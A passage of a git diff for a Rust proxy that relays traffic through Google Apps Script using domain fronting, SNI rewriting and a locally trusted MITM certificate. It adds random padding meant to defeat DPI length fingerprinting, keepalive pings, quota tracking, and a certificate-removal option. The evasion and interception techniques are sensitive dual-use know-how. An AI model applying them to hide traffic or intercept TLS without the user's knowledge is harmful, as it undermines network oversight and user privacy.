cfg.validate().expect_err("invalid sni must fail validate()"); + let msg = format!("{}", err); + assert!(msg.contains("invalid sni"), "error should mention invalid sni: {}", msg); + } + + #[test] + fn fronting_group_rejects_empty_fields() { + for bad in [ + r#"{ "name": "", "ip": "1.2.3.4", "sni": "a.b", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "", "sni": "a.b", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "", "domains": ["x.com"] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": [] }"#, + r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": [" "] }"#, + ] { + let s = format!( + r#"{{ "mode": "direct", "fronting_groups": [{}] }}"#, + bad + ); + let cfg: Config = serde_json::from_str(&s).unwrap(); + assert!( + cfg.validate().is_err(), + "expected validation error for: {}", + bad + ); + } + } + #[test] fn rejects_same_http_and_socks5_port() { let s = r#"{ diff --git a/src/domain_fronter.rs b/src/domain_fronter.rs index a18dd212..19807b23 100644 --- a/src/domain_fronter.rs +++ b/src/domain_fronter.rs @@ -21,6 +21,7 @@ use std::time::{Duration, Instant}; use base64::engine::general_purpose::STANDARD as B64; use base64::Engine; +use rand::{thread_rng, Rng, RngCore}; use serde::{Deserialize, Serialize}; use serde_json::Value; use tokio::io::{AsyncReadExt, AsyncWriteExt}; @@ -60,6 +61,11 @@ const POOL_TTL_SECS: u64 = 45; const POOL_MAX: usize = 80; const REQUEST_TIMEOUT_SECS: u64 = 25; const RANGE_PARALLEL_CHUNK_BYTES: u64 = 256 * 1024; +/// Cadence for Apps Script container keepalive pings. Apps Script +/// containers go cold after ~5min idle and cost 1-3s on the first +/// request to wake back up — most painful on YouTube / streaming where +/// the first chunk after a quiet pause stalls the player. +const H1_KEEPALIVE_INTERVAL_SECS: u64 = 240; // Keep synthetic range stitching bounded. Without this, a buggy or hostile // origin can advertise `Content-Range: bytes 0-1/` and make us build a // massive range plan or preallocate an enormous response buffer. @@ -102,6 +108,13 @@ pub struct DomainFronter { inflight: Arc>>>>, coalesced: AtomicU64, blacklist: Arc>>, + /// Per-deployment rolling timeout counter. Maps `script_id` → + /// `(window_start, strike_count)`. Reset when the window expires + /// or when a batch succeeds. Triggers a short-cooldown blacklist + /// at `TIMEOUT_STRIKE_LIMIT`. Distinct from `blacklist` because + /// strike state is per-deployment health bookkeeping, not the + /// permanent ban list. + script_timeouts: Arc>>, relay_calls: AtomicU64, relay_failures: AtomicU64, bytes_relayed: AtomicU64, @@ -123,6 +136,21 @@ pub struct DomainFronter { today_calls: AtomicU64, today_bytes: AtomicU64, today_key: std::sync::Mutex, + /// Suppress the random `_pad` field that v1.8.0+ adds to outbound + /// payloads. Mirrors `Config::disable_padding` (#391). Default false + /// (padding active = stronger DPI defense at +25% bandwidth cost). + disable_padding: bool, + /// Per-instance auto-blacklist tuning. Mirrors `Config::auto_blacklist_*` + /// (#391, #444). Cached here so the hot path in `record_timeout_strike` + /// doesn't have to reach back through the Config (which we don't keep + /// a reference to). + auto_blacklist_strikes: u32, + auto_blacklist_window: Duration, + auto_blacklist_cooldown: Duration, + /// Per-batch HTTP timeout. Mirrors `Config::request_timeout_secs` + /// (#430, masterking32 PR #25). Read by `tunnel_client::fire_batch` + /// so a single config field tunes the timeout used everywhere. + batch_timeout: Duration, } /// Aggregated stats for one remote host. @@ -146,6 +174,12 @@ impl HostStat { const BLACKLIST_COOLDOWN_SECS: u64 = 600; +/// Auto-blacklist defaults are now per-instance fields on `DomainFronter`, +/// driven by `Config::auto_blacklist_strikes` / `_window_secs` / +/// `_cooldown_secs` (#391, #444). The constants below are gone — see the +/// `Config` doc comments for tuning guidance and `default_auto_blacklist_*` +/// for the historical defaults (3 strikes / 30s window / 120s cooldown). + /// Request payload sent to Apps Script (single, non-batch). #[derive(Serialize)] struct RelayRequest<'a> { @@ -258,21 +292,44 @@ impl DomainFronter { inflight: Arc::new(Mutex::new(HashMap::new())), coalesced: AtomicU64::new(0), blacklist: Arc::new(std::sync::Mutex::new(HashMap::new())), + script_timeouts: Arc::new(std::sync::Mutex::new(HashMap::new())), relay_calls: AtomicU64::new(0), relay_failures: AtomicU64::new(0), bytes_relayed: AtomicU64::new(0), per_site: Arc::new(std::sync::Mutex::new(HashMap::new())), today_calls: AtomicU64::new(0), today_bytes: AtomicU64::new(0), - today_key: std::sync::Mutex::new(current_utc_day_key()), + today_key: std::sync::Mutex::new(current_pt_day_key()), + disable_padding: config.disable_padding, + auto_blacklist_strikes: config.auto_blacklist_strikes.max(1), + auto_blacklist_window: Duration::from_secs( + config.auto_blacklist_window_secs.clamp(1, 3600), + ), + auto_blacklist_cooldown: Duration::from_secs( + config.auto_blacklist_cooldown_secs.clamp(1, 86400), + ), + batch_timeout: Duration::from_secs( + config.request_timeout_secs.clamp(5, 300), + ), }) } + /// Per-batch HTTP round-trip timeout. Read by `tunnel_client` so the + /// `BATCH_TIMEOUT` constant doesn't have to be touched on every config + /// change. Clamped to `[5s, 300s]` at construction. + pub(crate) fn batch_timeout(&self) -> Duration { + self.batch_timeout + } + /// Record one relay call toward the daily budget. Called once per /// outbound Apps Script fetch. Rolls over both daily counters at - /// 00:00 UTC. - fn record_today(&self, bytes: u64) { - let today = current_utc_day_key(); + /// 00:00 Pacific Time, matching Apps Script's quota reset cadence + /// (#230, #362). Crate-public so the Full-mode batch path in + /// `tunnel_client::fire_batch` can wire into the same accounting + /// (Apps Script sees Full-mode batches as ordinary `UrlFetchApp` + /// calls and counts them against the same daily quota). + pub(crate) fn record_today(&self, bytes: u64) { + let today = current_pt_day_key(); // Fast path: same day as what we last saw. No lock. let mut guard = self.today_key.lock().unwrap(); if *guard != today { @@ -317,8 +374,8 @@ impl DomainFronter { // Read today_key under lock and cheaply check rollover so the // UI never sees stale "today_calls=1847" on a day where no // traffic has flowed yet (e.g. user left the app open past - // midnight UTC). - let today_now = current_utc_day_key(); + // midnight PT). + let today_now = current_pt_day_key(); let today_key = { let mut guard = self.today_key.lock().unwrap(); if *guard != today_now { @@ -341,7 +398,7 @@ impl DomainFronter { today_calls: self.today_calls.load(Ordering::Relaxed), today_bytes: self.today_bytes.load(Ordering::Relaxed), today_key, - today_reset_secs: seconds_until_utc_midnight(), + today_reset_secs: seconds_until_pacific_midnight(), } } @@ -414,17 +471,67 @@ impl DomainFronter { } fn blacklist_script(&self, script_id: &str, reason: &str) { - let until = Instant::now() + Duration::from_secs(BLACKLIST_COOLDOWN_SECS); + self.blacklist_script_for( + script_id, + Duration::from_secs(BLACKLIST_COOLDOWN_SECS), + reason, + ); + } + + fn blacklist_script_for(&self, script_id: &str, cooldown: Duration, reason: &str) { + let until = Instant::now() + cooldown; let mut bl = self.blacklist.lock().unwrap(); bl.insert(script_id.to_string(), until); tracing::warn!( "blacklisted script {} for {}s: {}", mask_script_id(script_id), - BLACKLIST_COOLDOWN_SECS, + cooldown.as_secs(), reason ); } + /// Record a batch timeout against `script_id`. After + /// `TIMEOUT_STRIKE_LIMIT` timeouts inside `TIMEOUT_STRIKE_WINDOW` + /// the deployment is blacklisted with a short cooldown so the + /// round-robin stops sending real traffic to a deployment that's + /// hung (most commonly: stale `TUNNEL_SERVER_URL` after the + /// tunnel-node moved hosts). + pub(crate) fn record_timeout_strike(&self, script_id: &str) { + let now = Instant::now(); + let mut counts = self.script_timeouts.lock().unwrap(); + let entry = counts + .entry(script_id.to_string()) + .or_insert((now, 0)); + if now.duration_since(entry.0) > self.auto_blacklist_window { + *entry = (now, 1); + } else { + entry.1 += 1; + } + let strikes = entry.1; + if strikes >= self.auto_blacklist_strikes { + counts.remove(script_id); + drop(counts); + self.blacklist_script_for( + script_id, + self.auto_blacklist_cooldown, + &format!( + "{} timeouts in {}s", + strikes, + self.auto_blacklist_window.as_secs() + ), + ); + } + } + + /// Clear the timeout strike counter for `script_id`. Called after + /// a batch succeeds so a recovered deployment doesn't keep stale + /// strikes from hours ago — three strikes must occur within one + /// real failure burst, not accumulate across unrelated incidents. + pub(crate) fn record_batch_success(&self, script_id: &str) { + let mut counts = self.script_timeouts.lock().unwrap(); + counts.remove(script_id); + } + /// Log a relay failure with extra guidance on cert-validation cases. /// Rate-limited so a flood of identical "UnknownIssuer" errors doesn't /// fill the log. @@ -512,6 +619,45 @@ impl DomainFronter { } } + /// Keep the Apps Script container warm with a periodic HEAD ping. + /// + /// `acquire()` keeps the *TCP/TLS pool* warm but does nothing for the + /// V8 container Apps Script runs in: that goes cold ~5min after the + /// last UrlFetchApp call and costs 1-3s to spin back up. The symptom + /// is "first request after a quiet period stalls" — most visible on + /// YouTube where the player gives up on a 1.5s `googlevideo.com` + /// chunk that's actually waiting on a cold-start. + /// + /// Bypasses the response cache (`cache_key_opt = None`) and the + /// inflight coalescer — otherwise the second iteration would just + /// hit the cached response from the first and never reach Apps + /// Script. The relay payload itself is the cheapest non-error one + /// we can build: a HEAD against `http://example.com/` returns a few + /// hundred bytes, no body decode, no auth. + /// + /// Best-effort. Failures are debug-logged so a flaky network or + /// quota-exhausted account doesn't spam warnings every 4 minutes. + /// Loops forever — caller is expected to drop the JoinHandle on + /// shutdown (the task lives as long as the process). + pub async fn run_h1_keepalive(self: Arc) { + loop { + tokio::time::sleep(Duration::from_secs(H1_KEEPALIVE_INTERVAL_SECS)).await; + let t0 = Instant::now(); + // relay_uncoalesced returns Vec (always — errors are + // baked into 5xx responses), so just observe the duration + // for the debug line. We intentionally don't use relay() + // here because that path goes through the cache + coalesce + // layer, which would short-circuit subsequent pings. + let _ = self + .relay_uncoalesced("HEAD", "http://example.com/", &[], &[], None) + .await; + tracing::debug!( + "H1 container keepalive: {}ms", + t0.elapsed().as_millis() + ); + } + } + async fn acquire(&self) -> Result { { let mut pool = self.pool.lock().await; @@ -642,9 +788,9 @@ impl DomainFronter { /// by relay() already (we skip cache for it). /// 2. Probe with `Range: bytes=0-`. /// 3. 200 back (origin doesn't support ranges) → return as-is. - /// 4. 206 back → parse Content-Range total. If the body fits in - /// the first probe (total <= chunk or body >= total), rewrite - /// the 206 to a 200 so the client — which never asked for a + /// 4. 206 back → parse Content-Range total. If Content-Range says + /// the entity fits in the first probe, rewrite the 206 to a 200 + /// so the client — which never asked for a /// range — doesn't choke on a stray Partial Content. (x.com /// and Cloudflare turnstile in particular reject unsolicited /// 206 on XHR/fetch.) @@ -765,24 +911,39 @@ impl DomainFronter { match chunk { Ok(chunk) => full.extend_from_slice(&chunk), Err(reason) => { + // Issue #162: silently rewriting the probe to a 200 + // here truncates the response to whatever the probe + // saw (typically 256 KiB — the chunk size). Browsers + // see HTTP 200 + Content-Length=262144 and treat + // the download as complete; users reported "every + // file capped at 256 KB" because every download + // that hit this failure path landed there. Common + // triggers: Apps Script stripping Content-Range, + // origin returning 200-instead-of-206 on later + // chunks, total mismatch across chunks. Correct + // recovery is a fresh single GET — Apps Script + // fetches the full URL up to its 50 MiB cap. Slow + // for big files vs. the parallel path but produces + // a complete response, which is what matters. tracing::warn!( - "range-parallel: invalid chunk {}-{} for {} ({}); falling back to probe response", - start, - end, - url, - reason, + "range-parallel: invalid chunk {}-{} for {} ({}); falling back to single GET", + start, end, url, reason, ); - return rewrite_206_to_200(&first); + return self.relay(method, url, headers, body).await; } } } if (full.len() as u64) != total { + // Same fallback rationale as the chunk-validation case + // above: returning the probe truncates to 256 KiB. Single + // GET is the only way to give the user a complete file + // when the parallel stitch can't be trusted. tracing::warn!( - "range-parallel: stitched {}/{} bytes for {}; falling back to probe response", + "range-parallel: stitched {}/{} bytes for {}; falling back to single GET", full.len(), total, url, ); - return rewrite_206_to_200(&first); + return self.relay(method, url, headers, body).await; } // Build a 200 OK with Content-Length = full body length. Drop @@ -1060,7 +1221,18 @@ impl DomainFronter { ct, r: true, }; - Ok(serde_json::to_vec(&req)?) + // Serialize via Value so we can splice in the random `_pad` field + // without changing RelayRequest's wire schema. Apps Script ignores + // unknown JSON fields, so old Code.gs deployments stay compatible + // — the pad is just bytes-on-the-wire that the server sees and + // discards. + let mut v = serde_json::to_value(&req)?; + if let Value::Object(map) = &mut v { + if !self.disable_padding { + add_random_pad(map); + } + } + Ok(serde_json::to_vec(&v)?) } // ────── Full-mode tunnel protocol ────────────────────────────────── @@ -1188,6 +1360,9 @@ impl DomainFronter { if let Some(d) = data { map.insert("d".into(), Value::String(d)); } + if !self.disable_padding { + add_random_pad(&mut map); + } Ok(serde_json::to_vec(&Value::Object(map))?) } @@ -1215,6 +1390,9 @@ impl DomainFronter { map.insert("k".into(), Value::String(self.auth_key.clone())); map.insert("t".into(), Value::String("batch".into())); map.insert("ops".into(), serde_json::to_value(ops)?); + if !self.disable_padding { + add_random_pad(&mut map); + } let payload = serde_json::to_vec(&Value::Object(map))?; let path = format!("/macros/s/{}/exec", script_id); @@ -1393,10 +1571,26 @@ fn validate_probe_range( return None; } let range = parse_content_range(headers)?; - if range.start != 0 || range.end > requested_end || !content_range_matches_body(range, body.len()) { + if range.start != 0 || range.end > requested_end { return None; } - Some(range) + if content_range_matches_body(range, body.len()) + || probe_range_covers_complete_entity(range, requested_end) + { + return Some(range); + } + None +} + +fn probe_range_covers_complete_entity(range: ContentRange, requested_end: u64) -> bool { + // Apps Script may decode a gzip body while preserving the origin's + // compressed Content-Range. For the synthetic first probe only, a + // 0..total-1 range within the requested chunk is enough to prove we + // already have the complete entity; later chunks still require exact + // Content-Range/body length validation in extract_exact_range_body(). + range.start == 0 + && range.end.saturating_add(1) >= range.total + && range.total <= requested_end.saturating_add(1) } fn checked_stitched_range_capacity(total: u64) -> Option { @@ -1509,30 +1703,74 @@ fn normalize_x_graphql_url(url: &str) -> String { format!("{}{}{}?{}", scheme, host, path, new_query) } -/// "YYYY-MM-DD" of the current UTC date. Used as the daily-reset -/// boundary for `today_calls` / `today_bytes`. We format manually so -/// this stays std-only and doesn't pull `time` or `chrono` for a -/// ~20-line helper. -fn current_utc_day_key() -> String { +/// Maximum bytes of random padding appended to outbound Apps Script +/// JSON request bodies. Picked so the per-request padding distribution +/// (uniformly 0..MAX) shifts the body length enough to defeat naive +/// length-fingerprint DPI without bloating bandwidth — at the average +/// 512-byte add, on a typical 2 KB tunnel batch this is +25%, which is +/// negligible compared to Apps Script's per-call latency floor anyway. +/// (Issue #313, #365 Section 1 — DPI evasion.) +const MAX_RANDOM_PAD_BYTES: usize = 1024; + +/// Insert a `_pad` field of random length (0..MAX_RANDOM_PAD_BYTES) +/// into a request payload before serialization. Server-side ignores +/// unknown JSON fields, so this is fully backward-compatible with old +/// `Code.gs` / `CodeFull.gs` deployments — the pad is just along for +/// the ride. +/// +/// Random bytes are base64-encoded (NO inner JSON-escape worries) and +/// the pad LENGTH itself is uniformly distributed, so packet sizes +/// land all over the place rather than clustering at a few discrete +/// peaks. That's the property DPI's length-distribution clustering +/// fingerprints can't match. +fn add_random_pad(map: &mut serde_json::Map) { + let mut rng = thread_rng(); + let len = rng.gen_range(0..=MAX_RANDOM_PAD_BYTES); + if len == 0 { + // Skip the field entirely sometimes — adds another bit of + // distribution variance (presence-vs-absence of `_pad` itself). + return; + } + let mut buf = vec![0u8; len]; + rng.fill_bytes(&mut buf); + map.insert("_pad".into(), Value::String(B64.encode(&buf))); +} + +/// "YYYY-MM-DD" of the current Pacific Time date. Used as the daily-reset +/// boundary for `today_calls` / `today_bytes` because **Apps Script's +/// quota counter resets at midnight Pacific Time, not UTC** — that's +/// where Google's quota bookkeeping lives. We format manually so this +/// stays std-only and doesn't pull `time-tz` or `chrono` plus a ~3 MB +/// IANA tzdb just for one ~50-line helper. (Issue #230, #362.) +/// +/// PT offset depends on DST: PST = UTC-8, PDT = UTC-7. We use the +/// stable US DST rule (2nd Sunday of March 02:00 → 1st Sunday of +/// November 02:00 = PDT, otherwise PST). The hour-of-day boundary on +/// transition days is approximated; this drifts by up to 1h for at +/// most 2h/year on the spring-forward / fall-back transitions, which +/// is fine for a daily countdown. +fn current_pt_day_key() -> String { let secs = std::time::SystemTime::now() .duration_since(std::time::UNIX_EPOCH) .map(|d| d.as_secs()) .unwrap_or(0); - let (y, m, d) = unix_to_ymd_utc(secs); + let pt_secs = unix_to_pt_seconds(secs); + let (y, m, d) = unix_to_ymd_utc(pt_secs); format!("{:04}-{:02}-{:02}", y, m, d) } -/// Seconds until the next 00:00 UTC. Used by the UI to render a -/// "resets in Xh Ym" countdown without the UI having to import time -/// libraries. Conservative: if the system clock is broken we return -/// 0 instead of a huge negative-looking number. -fn seconds_until_utc_midnight() -> u64 { +/// Seconds until the next 00:00 Pacific Time. Used by the UI to render +/// a "resets in Xh Ym" countdown matching Apps Script's actual quota +/// reset cadence (#230, #362). Conservative: if the system clock is +/// broken we return 0 instead of a huge negative-looking number. +fn seconds_until_pacific_midnight() -> u64 { let secs = std::time::SystemTime::now() .duration_since(std::time::UNIX_EPOCH) .map(|d| d.as_secs()) .unwrap_or(0); + let pt_secs = unix_to_pt_seconds(secs); let day = 86_400u64; - let rem = secs % day; + let rem = pt_secs % day; if rem == 0 { day } else { @@ -1540,6 +1778,65 @@ fn seconds_until_utc_midnight() -> u64 { } } +/// Convert Unix UTC seconds to "Pacific Time as if it were UTC" seconds, +/// i.e. add the PT-from-UTC offset (negative for the western hemisphere +/// becomes a subtraction). Result is suitable for feeding into +/// `unix_to_ymd_utc` to extract the PT calendar date, or for `% 86_400` +/// to find PT seconds-into-day. +fn unix_to_pt_seconds(utc_secs: u64) -> u64 { + // First-pass guess at PT date using PST (-8) — used to determine + // whether DST is currently in effect, which then settles the actual + // offset. The two-pass approach avoids the chicken-and-egg of + // "I need the PT date to know if it's DST, but I need the offset + // to compute the PT date." A 1-hour fudge in the guess is harmless + // because DST never starts within the first hour after midnight + // PST or ends within the first hour after midnight PDT. + let pst_guess = utc_secs.saturating_sub(8 * 3600); + let (y, m, d) = unix_to_ymd_utc(pst_guess); + let offset_secs = if pacific_is_dst(y, m, d) { + 7 * 3600 + } else { + 8 * 3600 + }; + utc_secs.saturating_sub(offset_secs) +} + +/// Whether Pacific Time is observing daylight saving on the given +/// calendar date (year, month=1..12, day=1..31). US DST window: +/// 2nd Sunday of March through 1st Sunday of November. The transition +/// hour itself (02:00 local) is approximated to whole-day boundaries — +/// good enough for a daily-quota countdown. +fn pacific_is_dst(year: i64, month: u32, day: u32) -> bool { + if month < 3 || month > 11 { + return false; + } + if month > 3 && month < 11 { + return true; + } + if month == 3 { + let dst_start = nth_sunday_of_month(year, 3, 2); + day >= dst_start + } else { + // month == 11 + let dst_end = nth_sunday_of_month(year, 11, 1); + day < dst_end + } +} + +/// Day-of-month for the Nth Sunday (1-indexed) of (year, month). Uses +/// Sakamoto's method for the month's-1st day-of-week, then offsets to +/// the desired Sunday. Pure arithmetic, no calendar tables. +fn nth_sunday_of_month(year: i64, month: u32, nth: u32) -> u32 { + // Sakamoto's day-of-week. 0 = Sunday. + static T: [i64; 12] = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4]; + let y = if month < 3 { year - 1 } else { year }; + let m = month as i64; + let dow_of_1st = + ((y + y / 4 - y / 100 + y / 400 + T[(m - 1) as usize] + 1).rem_euclid(7)) as u32; + let first_sunday = if dow_of_1st == 0 { 1 } else { 8 - dow_of_1st }; + first_sunday + (nth - 1) * 7 +} + /// Convert a Unix timestamp (seconds since 1970-01-01 UTC) to a /// (year, month, day) tuple, UTC. Standalone so we can stay /// std-only — no chrono/time/jiff dependency pulled for one caller. @@ -2012,15 +2309,18 @@ pub struct StatsSnapshot { pub cache_bytes: usize, pub blacklisted_scripts: usize, pub total_scripts: usize, - /// Relay calls attributed to the current UTC day. Resets at 00:00 UTC. - /// This is what-this-process-has-done today, not the Google-side bucket. + /// Relay calls attributed to the current Pacific Time day. Resets + /// at 00:00 PT (midnight Pacific) — matches Apps Script's actual + /// quota reset cadence (#230, #362). This is what-this-process- + /// has-done today, not the Google-side bucket. pub today_calls: u64, - /// Response bytes from relay calls attributed to the current UTC day. + /// Response bytes from relay calls attributed to the current PT day. pub today_bytes: u64, - /// "YYYY-MM-DD" of the day `today_calls` / `today_bytes` refer to. - /// Useful for cross-referencing against Google's dashboard. + /// "YYYY-MM-DD" of the PT day `today_calls` / `today_bytes` refer + /// to. Useful for cross-referencing against Google's dashboard, + /// which is also PT-aligned. pub today_key: String, - /// Seconds until the next 00:00 UTC rollover. Convenient for the UI + /// Seconds until the next 00:00 PT rollover. Convenient for the UI /// to render "Resets in Xh Ym" without importing time libraries. pub today_reset_secs: u64, } @@ -2092,6 +2392,11 @@ fn looks_like_quota_error(msg: &str) -> bool { || lower.contains("rate limit") || lower.contains("too many times") || lower.contains("service invoked") + || lower.contains("bandwidth") + || lower.contains("bandbreitenkontingent") + || lower.contains("datenübertragungsrate") + || lower.contains("transfer rate") + || lower.contains("limit exceeded") } fn mask_script_id(id: &str) -> String { @@ -2227,12 +2532,47 @@ mod tests { } #[test] - fn seconds_until_utc_midnight_is_bounded() { - let n = seconds_until_utc_midnight(); + fn seconds_until_pacific_midnight_is_bounded() { + let n = seconds_until_pacific_midnight(); // Must be in (0, 86400] for any valid system clock. assert!(n > 0 && n <= 86_400); } + #[test] + fn nth_sunday_of_month_anchors() { + // Spot-check Sakamoto's day-of-week + offset arithmetic against + // a few known Sundays. Mistakes here would silently shift the + // DST transition by ±1 week. + // March 2026: 2nd Sunday is March 8 (Sun Mar 1, Sun Mar 8). + assert_eq!(nth_sunday_of_month(2026, 3, 2), 8); + // November 2026: 1st Sunday is November 1 (Sun Nov 1). + assert_eq!(nth_sunday_of_month(2026, 11, 1), 1); + // March 2024: 2nd Sunday is March 10 (Sun Mar 3, Sun Mar 10). + assert_eq!(nth_sunday_of_month(2024, 3, 2), 10); + // November 2024: 1st Sunday is November 3. + assert_eq!(nth_sunday_of_month(2024, 11, 1), 3); + // March 2027: 2nd Sunday is March 14. + assert_eq!(nth_sunday_of_month(2027, 3, 2), 14); + } + + #[test] + fn pacific_dst_window_anchors() { + // Outside the DST window: PST. + assert!(!pacific_is_dst(2026, 1, 15)); + assert!(!pacific_is_dst(2026, 12, 25)); + assert!(!pacific_is_dst(2026, 2, 28)); + assert!(!pacific_is_dst(2026, 11, 5)); // first Sun of Nov 2026 = Nov 1; Nov 5 is past + // Inside: PDT. + assert!(pacific_is_dst(2026, 6, 1)); + assert!(pacific_is_dst(2026, 9, 30)); + // Boundary: March 8, 2026 (DST start day) and after = PDT. + assert!(!pacific_is_dst(2026, 3, 7)); + assert!(pacific_is_dst(2026, 3, 8)); + // Boundary: Oct 31 = PDT, Nov 1 = first Sunday = PST flips on. + assert!(pacific_is_dst(2026, 10, 31)); + assert!(!pacific_is_dst(2026, 11, 1)); + } + #[test] fn filter_forwarded_headers_strips_identity_revealing_headers() { // Issue #104: any proxy/extension that inserts these must not @@ -2428,6 +2768,59 @@ mod tests { assert_eq!(parse_content_range_total(&headers), None); } + #[test] + fn validate_probe_range_accepts_decoded_full_entity_body_mismatch() { + let mut raw = b"HTTP/1.1 206 Partial Content\r\n\ +Content-Range: bytes 0-11247/11248\r\n\ +Content-Type: text/javascript\r\n\ +Vary: Accept-Encoding\r\n\ +Content-Length: 45812\r\n\r\n" + .to_vec(); + raw.extend(std::iter::repeat(b'x').take(45_812)); + + let (status, headers, body) = split_response(&raw).unwrap(); + assert_eq!( + validate_probe_range(status, &headers, body, RANGE_PARALLEL_CHUNK_BYTES - 1), + Some(ContentRange { + start: 0, + end: 11_247, + total: 11_248, + }), + ); + + let rewritten = rewrite_206_to_200(&raw); + let (status, headers, body) = split_response(&rewritten).unwrap(); + assert_eq!(status, 200); + assert_eq!(body.len(), 45_812); + assert!(!headers + .iter() + .any(|(k, _)| k.eq_ignore_ascii_case("content-range"))); + assert_eq!( + headers + .iter() + .find(|(k, _)| k.eq_ignore_ascii_case("content-length")) + .map(|(_, v)| v.as_str()), + Some("45812"), + ); + } + + #[test] + fn validate_probe_range_rejects_missing_content_range() { + assert!(validate_probe_range(206, &[], b"hello", 4).is_none()); + } + + #[test] + fn validate_probe_range_rejects_nonzero_start() { + let headers = vec![("Content-Range".to_string(), "bytes 1-4/20".to_string())]; + assert!(validate_probe_range(206, &headers, b"hell", 4).is_none()); + } + + #[test] + fn validate_probe_range_rejects_end_past_requested_end() { + let headers = vec![("Content-Range".to_string(), "bytes 0-5/20".to_string())]; + assert!(validate_probe_range(206, &headers, b"hello!", 4).is_none()); + } + #[test] fn validate_probe_range_rejects_body_length_mismatch() { let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())]; @@ -2444,6 +2837,16 @@ mod tests { assert_eq!(checked_stitched_range_capacity(u64::MAX), None); } + #[test] + fn extract_exact_range_body_rejects_body_length_mismatch() { + let raw = b"HTTP/1.1 206 Partial Content\r\n\ +Content-Range: bytes 5-9/20\r\n\ +Content-Length: 3\r\n\r\n\ +hey"; + let err = extract_exact_range_body(raw, 5, 9, 20).unwrap_err(); + assert_eq!(err, "Content-Range/body length mismatch"); + } + #[test] fn extract_exact_range_body_rejects_mismatched_content_range() { let raw = b"HTTP/1.1 206 Partial Content\r\n\ @@ -2476,6 +2879,9 @@ hello"; assert!(!should_blacklist(200, "")); assert!(!should_blacklist(502, "bad gateway")); assert!(looks_like_quota_error("Exception: Service invoked too many times per day")); + assert!(looks_like_quota_error( + "Exception: Bandbreitenkontingent überschritten: https://example.com. Verringern Sie die Datenübertragungsrate." + )); assert!(!looks_like_quota_error("bad url")); } diff --git a/src/main.rs b/src/main.rs index 92bf7f46..202c7ec5 100644 --- a/src/main.rs +++ b/src/main.rs @@ -7,7 +7,7 @@ use std::sync::Arc; use tokio::sync::Mutex; use tracing_subscriber::EnvFilter; -use mhrv_rs::cert_installer::{install_ca, is_ca_trusted}; +use mhrv_rs::cert_installer::{install_ca, is_ca_trusted, reconcile_sudo_environment, remove_ca}; use mhrv_rs::config::Config; use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE}; use mhrv_rs::proxy_server::ProxyServer; @@ -18,6 +18,7 @@ const VERSION: &str = env!("CARGO_PKG_VERSION"); struct Args { config_path: Option, install_cert: bool, + remove_cert: bool, no_cert_check: bool, command: Command, } @@ -44,6 +45,11 @@ USAGE: OPTIONS: -c, --config PATH Path to config.json (default: ./config.json) --install-cert Install the MITM CA certificate and exit + --remove-cert Remove the MITM CA from the OS trust store (verified by + name), then delete the on-disk ca/ directory and exit. + NSS cleanup (Firefox/Chrome) is best-effort. A fresh CA + is generated on next run. config.json and your Apps + Script deployment are untouched. --no-cert-check Skip the auto-install-if-untrusted check on startup -h, --help Show this message -V, --version Show version @@ -58,6 +64,7 @@ ENV: fn parse_args() -> Result { let mut config_path: Option = None; let mut install_cert = false; + let mut remove_cert = false; let mut no_cert_check = false; let mut command = Command::Serve; @@ -102,13 +109,18 @@ fn parse_args() -> Result { config_path = Some(PathBuf::from(v)); } "--install-cert" => install_cert = true, + "--remove-cert" => remove_cert = true, "--no-cert-check" => no_cert_check = true, other => return Err(format!("unknown argument: {}", other)), } } + if install_cert && remove_cert { + return Err("--install-cert and --remove-cert cannot be combined".into()); + } Ok(Args { config_path, install_cert, + remove_cert, no_cert_check, command, }) @@ -127,6 +139,14 @@ async fn main() -> ExitCode { // Install default rustls crypto provider (ring). let _ = rustls::crypto::ring::default_provider().install_default(); + // Must run before anything else reads HOME / USER / data_dir — if + // the user ran `sudo ./mhrv-rs ...`, this re-points HOME at the + // invoking user's home so user-scoped cert paths (Firefox profiles, + // macOS login keychain, the mhrv-rs data dir) are not silently + // operated against root's home. No-op on Windows and for non-sudo + // invocations. + reconcile_sudo_environment(); + let args = match parse_args() { Ok(a) => a, Err(e) => { @@ -136,6 +156,29 @@ async fn main() -> ExitCode { } }; + // --remove-cert runs without a valid config — the CA files may be + // the only thing present in the data dir. `config.json` and the + // Apps Script deployment are intentionally untouched: the user does + // not have to redeploy Code.gs after regenerating the CA. + if args.remove_cert { + init_logging("info"); + let base = mhrv_rs::data_dir::data_dir(); + match remove_ca(&base) { + Ok(outcome) => { + tracing::info!("{}", outcome.summary()); + tracing::info!( + "A fresh CA will be generated next time the proxy starts — \ + run --install-cert then to re-trust it." + ); + return ExitCode::SUCCESS; + } + Err(e) => { + eprintln!("remove failed: {}", e); + return ExitCode::FAILURE; + } + } + } + // --install-cert can run without a valid config — only needs the CA file. if args.install_cert { init_logging("info"); @@ -245,11 +288,12 @@ async fn main() -> ExitCode { tracing::info!("Script ID: {}", sids[0]); } } - mhrv_rs::config::Mode::GoogleOnly => { + mhrv_rs::config::Mode::Direct => { tracing::warn!( - "google_only bootstrap: direct SNI-rewrite tunnel to {} only. \ - Open https://script.google.com in your browser (proxy set to \ - {}:{}), deploy Code.gs, then switch to apps_script mode.", + "direct mode: SNI-rewrite tunnel only (Google edge {} + any \ + configured fronting_groups). Open https://script.google.com \ + in your browser (proxy set to {}:{}), deploy Code.gs, then \ + switch to apps_script mode for full DPI bypass.", config.google_ip, config.listen_host, config.listen_port diff --git a/src/proxy_server.rs b/src/proxy_server.rs index 41063057..06ed7feb 100644 --- a/src/proxy_server.rs +++ b/src/proxy_server.rs @@ -15,7 +15,7 @@ use tokio_rustls::rustls::server::Acceptor; use tokio_rustls::rustls::{ClientConfig, DigitallySignedStruct, SignatureScheme}; use tokio_rustls::{LazyConfigAcceptor, TlsAcceptor, TlsConnector}; -use crate::config::{Config, Mode}; +use crate::config::{Config, FrontingGroup, Mode}; use crate::domain_fronter::DomainFronter; use crate::mitm::MitmCertManager; use crate::tunnel_client::{decode_udp_packets, TunnelMux}; @@ -47,6 +47,18 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[ "youtu.be", "youtube-nocookie.com", "ytimg.com", + // NOTE on `googlevideo.com`: v1.7.4 (#275) added this here on the + // theory that 